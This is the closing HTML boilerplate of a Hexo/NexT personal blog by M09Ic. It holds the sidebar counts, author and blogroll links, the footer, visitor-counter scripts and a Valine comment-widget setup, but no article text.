          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/M09Ic" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;M09Ic" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:m09ic@foxmail.com" title="E-Mail → mailto:m09ic@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://yml-sec.top/" title="https:&#x2F;&#x2F;yml-sec.top" rel="noopener" target="_blank">夜莫离</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://nightrainy.github.io/" title="https:&#x2F;&#x2F;nightrainy.github.io" rel="noopener" target="_blank">知世</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.360bug.net/" title="http:&#x2F;&#x2F;www.360bug.net" rel="noopener" target="_blank">孙德胜</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-paper-plane"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">M09ic</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'yP9ifyVVnh7znqRQVWNWn0V6-gzGzoHsz',
      appKey     : 'k84kdIIIEt3b7F17XqEoBT22',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
